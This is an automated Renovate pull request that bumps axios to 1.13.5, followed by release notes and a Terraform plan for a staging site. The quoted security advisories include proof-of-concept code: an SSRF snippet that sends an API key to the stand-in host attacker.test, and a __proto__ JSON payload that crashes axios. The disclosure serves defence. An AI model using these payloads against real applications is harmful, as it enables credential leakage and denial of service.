Update dependency axios to v1 [SECURITY]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	0.27.2 → 1.13.5

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

CVE-2026-25639

Denial of Service via proto Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

1. JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
2. Object.keys() includes '__proto__' in the iteration
3. mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
4. The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
5. Object.prototype(...) throws TypeError: merge is not a function

The mergeConfig function is called by:

• Axios._request() at lib/core/Axios.js:75
• Axios.getUri() at lib/core/Axios.js:201
• All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

Reproduction steps:

1. Clone axios repository or npm install axios
2. Create file poc.mjs with the code above
3. Run: node poc.mjs
4. Observe the TypeError crash

Verified output (axios 1.13.4):

TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)

Control tests performed:

Test	Config	Result
Normal config	{"timeout": 5000}	SUCCESS
Malicious config	JSON.parse('{"__proto__": {"x": 1}}')	CRASH
Nested object	{"headers": {"X-Test": "value"}}	SUCCESS

Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.

Impact

Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

• Node.js servers using axios for HTTP requests
• Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.

---

Release Notes

axios/axios (axios)

v1.13.5

Compare Source

Release 1.13.5

Highlights

• Security: Fixed a potential Denial of Service issue involving the __proto__ key in mergeConfig. (PR #​7369)
• Bug fix: Resolved an issue where AxiosError could be missing the status field on and after v1.13.3. (PR #​7368)

Changes

Security

• Fix Denial of Service via __proto__ key in mergeConfig. (PR #​7369)

Fixes

• Fix/5657. (PR #​7313)
• Ensure status is present in AxiosError on and after v1.13.3. (PR #​7368)

Features / Improvements

• Add input validation to isAbsoluteURL. (PR #​7326)
• Refactor: bump minor package versions. (PR #​7356)

Documentation

• Clarify object-check comment. (PR #​7323)
• Fix deprecated Buffer constructor usage and README formatting. (PR #​7371)

CI / Maintenance

• Chore: fix issues with YAML. (PR #​7355)
• CI: update workflow YAMLs. (PR #​7372)
• CI: fix run condition. (PR #​7373)
• Dev deps: bump karma-sourcemap-loader from 0.3.8 to 0.4.0. (PR #​7360)
• Chore(release): prepare release 1.13.5. (PR #​7379)

New Contributors

• @​sachin11063 (first contribution — PR #​7323)
• @​asmitha-16 (first contribution — PR #​7326)

Full Changelog: axios/axios@v1.13.4...v1.13.5

v1.13.4

Compare Source

Overview

The release addresses issues discovered in v1.13.3 and includes significant CI/CD improvements.

Full Changelog: v1.13.3...v1.13.4

What's New in v1.13.4

Bug Fixes

• fix: issues with version 1.13.3 (#​7352) (ee90dfc)
  • Fixed issues discovered in v1.13.3 release
  • Cleaned up interceptor test files
  • Improved workflow configurations

Infrastructure & CI/CD

• refactor: ci and build (#​7340) (8ff6c19)

  • Major refactoring of CI/CD workflows
  • Consolidated workflow files for better maintainability
  • Added mise configuration for the development environment
  • Improved sponsor block update automation
  • Enhanced issue and PR templates
  • Added automatic release notes generation
  • Implemented workflow cancellation for concurrent runs

• chore: codegen and some updates to workflows (76cf77b)

  • Code generation improvements
  • Workflow optimisations

Migration Notes

Breaking Changes

None in this release.

Deprecations

None in this release.

Contributors

Thank you to all contributors who made this release possible! Special thanks to:

• jasonsaayman - Release management and CI/CD improvements

v1.13.3

Compare Source

Bug Fixes

• http2: Use port 443 for HTTPS connections by default. (#​7256) (d7e6065)
• interceptor: handle the error in the same interceptor (#​6269) (5945e40)
• main field in package.json should correspond to cjs artifacts (#​5756) (7373fbf)
• package.json: add 'bun' package.json 'exports' condition. Load the Node.js build in Bun instead of the browser build (#​5754) (b89217e)
• silentJSONParsing=false should throw on invalid JSON (#​7253) (#​7257) (7d19335)
• turn AxiosError into a native error (#​5394) (#​5558) (1c6a86d)
• types: add handlers to AxiosInterceptorManager interface (#​5551) (8d1271b)
• types: restore AxiosError.cause type from unknown to Error (#​7327) (d8233d9)
• unclear error message is thrown when specifying an empty proxy authorization (#​6314) (6ef867e)

Features

• add undefined as a value in AxiosRequestConfig (#​5560) (095033c)
• add automatic minor and patch upgrades to dependabot (#​6053) (65a7584)
• add Node.js coverage script using c8 (closes #​7289) (#​7294) (ec9d94e)
• added copilot instructions (3f83143)
• compatibility with frozen prototypes (#​6265) (860e033)
• enhance pipeFileToResponse with error handling (#​7169) (88d7884)
• types: Intellisense for string literals in a widened union (#​6134) (f73474d), closes /github.com/microsoft/TypeScript/issues/33471#issuecomment-1376364329

Reverts

• Revert "fix: silentJSONParsing=false should throw on invalid JSON (#​7253) (#​7…" (#​7298) (a4230f5), closes #​7253 #​7 #​7298
• deps: bump peter-evans/create-pull-request from 7 to 8 in the github-actions group (#​7334) (2d6ad5e)

Contributors to this release

• Ashvin Tiwari
• Nikunj Mochi
• Anchal Singh
• jasonsaayman
• Julian Dax
• Akash Dhar Dubey
• Madhumita
• Tackoil
• Justin Dhillon
• Rudransh
• WuMingDao
• codenomnom
• Nandan Acharya
• Eric Dubé
• Tibor Pilz
• Gabriel Quaresma
• Turadg Aleahmad
• JohnTitor
• rohit miryala
• Wilson Mun
• techcodie
• Ved Vadnere
• svihpinc
• SANDESH LENDVE
• Lubos
• Jarred Sumner
• Adam Hines
• Subhan Kumar Rai
• Joseph Frazier
• KT0803
• Albie
• Jake Hayes

v1.13.2

Compare Source

Bug Fixes

• http: fix 'socket hang up' bug for keep-alive requests when using timeouts; (#​7206) (8d37233)
• http: use default export for http2 module to support stubs; (#​7196) (0588880)

Performance Improvements

• http: fix early loop exit; (#​7202) (12c314b)

Contributors to this release

• Dmitriy Mozgovoy
• Kasper Isager Dalsgarð

v1.13.1

Compare Source

Bug Fixes

• http: fixed a regression that caused the data stream to be interrupted for responses with non-OK HTTP statuses; (#​7193) (bcd5581)

Contributors to this release

• Anchal Singh
• Dmitriy Mozgovoy

v1.13.0

Compare Source

Bug Fixes

• fetch: prevent TypeError when config.env is undefined (#​7155) (015faec)
• resolve issue #​7131 (added spacing in mergeConfig.js) (#​7133) (9b9ec98)

Features

• http: add HTTP2 support; (#​7150) (d676df7)

Contributors to this release

• Dmitriy Mozgovoy
• Noritaka Kobayashi
• Aviraj2929
• prasoon patel
• Samyak Dandge
• Anchal Singh
• Rahul Kumar
• Amit Verma
• Abhishek3880
• Dhvani Maktuporia
• Usama Ayoub
• ikuy1203
• Nikhil Simon Toppo
• Jane Wangari
• Supakorn Ieamgomol
• Kian-Meng Ang
• UTSUMI Keiji

1.12.2 (2025-09-14)

Bug Fixes

• fetch: use current global fetch instead of cached one when env fetch is not specified to keep MSW support; (#​7030) (cf78825)

Contributors to this release

• Dmitriy Mozgovoy
• Noritaka Kobayashi

1.12.1 (2025-09-12)

Bug Fixes

• types: fixed env config types; (#​7020) (b5f26b7)

Contributors to this release

• Dmitriy Mozgovoy

v1.12.2

Compare Source

Bug Fixes

• fetch: use current global fetch instead of cached one when env fetch is not specified to keep MSW support; (#​7030) (cf78825)

Contributors to this release

• Dmitriy Mozgovoy
• Noritaka Kobayashi

v1.12.1

Compare Source

Bug Fixes

• types: fixed env config types; (#​7020) (b5f26b7)

Contributors to this release

• Dmitriy Mozgovoy

v1.12.0

Compare Source

Bug Fixes

• adding build artifacts (9ec86de)
• dont add dist on release (a2edc36)
• fetch-adapter: set correct Content-Type for Node FormData (#​6998) (a9f47af)
• node: enforce maxContentLength for data: URLs (#​7011) (945435f)
• package exports (#​5627) (aa78ac2)
• params: removing '[' and ']' from URL encode exclude characters (#​3316) (#​5715) (6d84189)
• release pr run (fd7f404)
• types: change the type guard on isCancel (#​5595) (0dbb7fd)

Features

• adapter: surface low‑level network error details; attach original error via cause (#​6982) (78b290c)
• fetch: add fetch, Request, Response env config variables for the adapter; (#​7003) (c959ff2)
• support reviver on JSON.parse (#​5926) (2a97634), closes #​5924
• types: extend AxiosResponse interface to include custom headers type (#​6782) (7960d34)

Contributors to this release

• Willian Agostini
• Dmitriy Mozgovoy
• khani
• Ameer Assadi
• Emiedonmokumo Dick-Boro
• Zeroday BYTE
• Jason Saayman
• 최예찬
• Gligor Kotushevski
• Aleksandar Dimitrov

v1.11.0

Compare Source

Bug Fixes

• form-data npm pakcage (#​6970) (e72c193)
• prevent RangeError when using large Buffers (#​6961) (a2214ca)
• types: resolve type discrepancies between ESM and CJS TypeScript declaration files (#​6956) (8517aa1)

Contributors to this release

• izzy goldman
• Manish Sahani
• Noritaka Kobayashi
• James Nail
• Tejaswi1305

v1.10.0

Compare Source

Bug Fixes

• adapter: pass fetchOptions to fetch function (#​6883) (0f50af8)
• form-data: convert boolean values to strings in FormData serialization (#​6917) (5064b10)
• package: add module entry point for React Native; (#​6933) (3d343b8)

Features

• types: improved fetchOptions interface (#​6867) (63f1fce)

Contributors to this release

• Dmitriy Mozgovoy
• Noritaka Kobayashi
• Dimitrios Lazanas
• Adrian Knapp
• Howie Zhao
• Uhyeon Park
• Sampo Silvennoinen

v1.9.0

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• FatahChan
• Ionuț G. Stan

1.8.4 (2025-03-19)

Bug Fixes

• buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)

Contributors to this release

• Marc Hassan

1.8.3 (2025-03-10)

Bug Fixes

• add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
• xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)

Contributors to this release

• Ashcon Partovi
• StefanBRas
• Marc Hassan

1.8.2 (2025-03-07)

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

1.8.1 (2025-02-26)

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.8.4

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• FatahChan
• Ionuț G. Stan

1.8.4 (2025-03-19)

Bug Fixes

• buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)

Contributors to this release

• Marc Hassan

1.8.3 (2025-03-10)

Bug Fixes

• add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
• xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)

Contributors to this release

• Ashcon Partovi
• StefanBRas
• Marc Hassan

1.8.2 (2025-03-07)

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

1.8.1 (2025-02-26)

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.8.3

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• [Fa

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

Terraform Format and Style 🖌success

Terraform Initialization ⚙️success

Terraform Plan 📖success

Show Plan

terraform
module.thadmin_routing.module.acm.aws_acm_certificate.this: Refreshing state... [id=arn:aws:acm:us-east-1:627002765486:certificate/565d3a00-d047-48f2-956a-aed08dd6956b]
module.thadmin_routing.module.cloudfront.aws_cloudfront_origin_access_identity.this["s3_bucket"]: Refreshing state... [id=E3JOC36ODMBL65]
module.thadmin_hosting.aws_s3_bucket.this: Refreshing state... [id=thalia-thadmin-staging]
module.thadmin_routing.module.acm.aws_route53_record.validation["thadmin-staging.technicie.nl"]: Refreshing state... [id=Z3I4ZHBBD5NSHU__f4c1968cf0da5157d0f46ed63ecf426e.thadmin-staging.technicie.nl._CNAME]
module.thadmin_routing.module.acm.aws_acm_certificate_validation.this: Refreshing state... [id=2022-03-15 04:55:50.004 +0000 UTC]
module.thadmin_hosting.aws_s3_bucket_acl.this: Refreshing state... [id=thalia-thadmin-staging,private]
module.thadmin_hosting.aws_s3_bucket_cors_configuration.this: Refreshing state... [id=thalia-thadmin-staging]
module.thadmin_routing.module.cloudfront.aws_cloudfront_distribution.this[0]: Refreshing state... [id=E2ZP8HCBLISQFN]
module.thadmin_routing.aws_s3_bucket_policy.bucket_policy: Refreshing state... [id=thalia-thadmin-staging]
module.thadmin_routing.aws_route53_record.api: Refreshing state... [id=Z3I4ZHBBD5NSHU_thadmin-staging_A]
module.thadmin_hosting.aws_s3_object.code_build_object["js/499.1480f83d.js"]: Refreshing state... [id=thalia-thadmin-staging/js/499.1480f83d.js]
module.thadmin_hosting.aws_s3_object.code_build_object["site.webmanifest"]: Refreshing state... [id=site.webmanifest]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1668-2224.jpg"]: Refreshing state... [id=apple-splash-1668-2224.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2688-1242.jpg"]: Refreshing state... [id=apple-splash-2688-1242.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["safari-pinned-tab.svg"]: Refreshing state... [id=safari-pinned-tab.svg]
module.thadmin_hosting.aws_s3_object.code_build_object["mstile-310x310.png"]: Refreshing state... [id=mstile-310x310.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1536-2048.jpg"]: Refreshing state... [id=apple-splash-1536-2048.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1334-750.jpg"]: Refreshing state... [id=apple-splash-1334-750.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["favicon.svg"]: Refreshing state... [id=favicon.svg]
module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.cb611119.js"]: Refreshing state... [id=thalia-thadmin-staging/js/chunk-vendors.cb611119.js]
module.thadmin_hosting.aws_s3_object.code_build_object["img/anonymousUser.c7a94bce.jpg"]: Refreshing state... [id=img/anonymousUser.c7a94bce.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-828-1792.jpg"]: Refreshing state... [id=apple-splash-828-1792.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1242-2208.jpg"]: Refreshing state... [id=apple-splash-1242-2208.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2436-1125.jpg"]: Refreshing state... [id=apple-splash-2436-1125.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["android-chrome-192x192.png"]: Refreshing state... [id=android-chrome-192x192.png]
module.thadmin_hosting.aws_s3_object.code_build_object["android-chrome-512x512.png"]: Refreshing state... [id=android-chrome-512x512.png]
module.thadmin_hosting.aws_s3_object.code_build_object["favicon-16x16.png"]: Refreshing state... [id=favicon-16x16.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1170-2532.jpg"]: Refreshing state... [id=apple-splash-1170-2532.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-750-1334.jpg"]: Refreshing state... [id=apple-splash-750-1334.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2732-2048.jpg"]: Refreshing state... [id=apple-splash-2732-2048.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["index.html"]: Refreshing state... [id=index.html]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2224-1668.jpg"]: Refreshing state... [id=apple-splash-2224-1668.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1125-2436.jpg"]: Refreshing state... [id=apple-splash-1125-2436.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2160-1620.jpg"]: Refreshing state... [id=apple-splash-2160-1620.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["favicon.ico"]: Refreshing state... [id=favicon.ico]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2048-2732.jpg"]: Refreshing state... [id=apple-splash-2048-2732.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2532-1170.jpg"]: Refreshing state... [id=apple-splash-2532-1170.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["js/app.45964e33.js.map"]: Refreshing state... [id=thalia-thadmin-staging/js/app.45964e33.js.map]
module.thadmin_hosting.aws_s3_object.code_build_object["browserconfig.xml"]: Refreshing state... [id=browserconfig.xml]
module.thadmin_hosting.aws_s3_object.code_build_object["css/chunk-vendors.bd40d1d7.css"]: Refreshing state... [id=thalia-thadmin-staging/css/chunk-vendors.bd40d1d7.css]
module.thadmin_hosting.aws_s3_object.code_build_object["img/backgroundImage.24f22a44.jpg"]: Refreshing state... [id=img/backgroundImage.24f22a44.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2208-1242.jpg"]: Refreshing state... [id=apple-splash-2208-1242.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-640-1136.jpg"]: Refreshing state... [id=apple-splash-640-1136.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["js/chunk-vendors.cb611119.js.map"]: Refreshing state... [id=thalia-thadmin-staging/js/chunk-vendors.cb611119.js.map]
module.thadmin_hosting.aws_s3_object.code_build_object["js/app.45964e33.js"]: Refreshing state... [id=thalia-thadmin-staging/js/app.45964e33.js]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1242-2688.jpg"]: Refreshing state... [id=apple-splash-1242-2688.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["js/499.1480f83d.js.map"]: Refreshing state... [id=thalia-thadmin-staging/js/499.1480f83d.js.map]
module.thadmin_hosting.aws_s3_object.code_build_object["mstile-150x150.png"]: Refreshing state... [id=mstile-150x150.png]
module.thadmin_hosting.aws_s3_object.code_build_object["favicon.png"]: Refreshing state... [id=favicon.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2388-1668.jpg"]: Refreshing state... [id=apple-splash-2388-1668.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1136-640.jpg"]: Refreshing state... [id=apple-splash-1136-640.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["css/app.3dadf1fd.css"]: Refreshing state... [id=css/app.3dadf1fd.css]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-touch-icon.png"]: Refreshing state... [id=apple-touch-icon.png]
module.thadmin_hosting.aws_s3_object.code_build_object["mstile-70x70.png"]: Refreshing state... [id=mstile-70x70.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1284-2778.jpg"]: Refreshing state... [id=apple-splash-1284-2778.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1668-2388.jpg"]: Refreshing state... [id=apple-splash-1668-2388.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["mstile-310x150.png"]: Refreshing state... [id=mstile-310x150.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1792-828.jpg"]: Refreshing state... [id=apple-splash-1792-828.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["favicon-32x32.png"]: Refreshing state... [id=favicon-32x32.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-1620-2160.jpg"]: Refreshing state... [id=apple-splash-1620-2160.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2778-1284.jpg"]: Refreshing state... [id=apple-splash-2778-1284.jpg]
module.thadmin_hosting.aws_s3_object.code_build_object["mstile-144x144.png"]: Refreshing state... [id=mstile-144x144.png]
module.thadmin_hosting.aws_s3_object.code_build_object["apple-splash-2048-1536.jpg"]: Refreshing state... [id=apple-splash-2048-1536.jpg]
An execution plan has been generated and is shown below.

Resource actions are indicated with the following symbols:

create

~ update in-place


destroy

Terraform will perform the following actions:
module.thadmin_hosting.aws_s3_object.code_build_object["img/backgroundImage.24f22a44.jpg"] will be updated in-place
~ resource "aws_s3_object" "code_build_object" {

~ etag                   = "407e69540c950ce3e893be2cbadd0f30-2" -> "5f59aad8b5eddf226c7e5a21939e4018"

id                     = "img/backgroundImage.24f22a44.jpg"

tags                   = {}

+ version_id             = (known after apply)

# (12 unchanged attributes hidden)

}
module.thadmin_hosting.aws_s3_object.code_build_object["index.html"] will be updated in-place
~ resource "aws_s3_object" "code_build_object" {

~ etag                   = "2b2a2fe05a0600fac657c64f82b4d123" -> "d22767ab8a214acb4ebf489268f95625"

id                     = "index.html"

tags                   = {}

+ version_id             = (known after apply)

# (12 unchanged attributes hidden)

}
module.thadmin_hosting.aws_s3_object.code_build_object["js/499.1480f83d.js"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/499.1480f83d.js" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "text/javascript" -> null
etag                   = "804526fc25c56a6c2549321a4e7ddfe3" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/499.1480f83d.js" -> null
key                    = "js/499.1480f83d.js" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/499.1480f83d.js" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/499.1480f83d.js.map"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/499.1480f83d.js.map" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "application/octet-stream" -> null
etag                   = "e85a2fd9f5bcb2faccd04f96e9e606ed" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/499.1480f83d.js.map" -> null
key                    = "js/499.1480f83d.js.map" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/499.1480f83d.js.map" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/640.89155903.js"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "text/javascript"
etag                   = "06ec59e4ef2fb1d9a8724b54da9f2109"
force_destroy          = false
id                     = (known after apply)
key                    = "js/640.89155903.js"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/640.89155903.js"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/640.89155903.js.map"] will be created

resource "aws_s3_object" "code_build_object" {

acl                    = (known after apply)
arn                    = (known after apply)
bucket                 = "thalia-thadmin-staging"
bucket_key_enabled     = (known after apply)
checksum_crc32         = (known after apply)
checksum_crc32c        = (known after apply)
checksum_crc64nvme     = (known after apply)
checksum_sha1          = (known after apply)
checksum_sha256        = (known after apply)
content_type           = "application/octet-stream"
etag                   = "df6a831cad14a1d1ced6eccdf8e2ff5e"
force_destroy          = false
id                     = (known after apply)
key                    = "js/640.89155903.js.map"
kms_key_id             = (known after apply)
region                 = "eu-west-1"
server_side_encryption = (known after apply)
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/640.89155903.js.map"
storage_class          = (known after apply)
tags_all               = (known after apply)
version_id             = (known after apply)

}



module.thadmin_hosting.aws_s3_object.code_build_object["js/app.45964e33.js"] will be destroyed

resource "aws_s3_object" "code_build_object" {

arn                    = "arn:aws:s3:::thalia-thadmin-staging/js/app.45964e33.js" -> null
bucket                 = "thalia-thadmin-staging" -> null
bucket_key_enabled     = false -> null
content_type           = "text/javascript" -> null
etag                   = "4d2505a52648207191ffe826edff07ad" -> null
force_destroy          = false -> null
id                     = "thalia-thadmin-staging/js/app.45964e33.js" -> null
key                    = "js/app.45964e33.js" -> null
metadata               = {} -> null
region                 = "eu-west-1" -> null
server_side_encryption = "AES256" -> null
source                 = "/home/runner/work/thadmin/thadmin/infra/modules/hosting/../../..//dist/js/app.45964e33.js" -> null
storage_class          = "STANDARD" -> null
tags                   = {} -> null
tags_all               = {} -> null

}



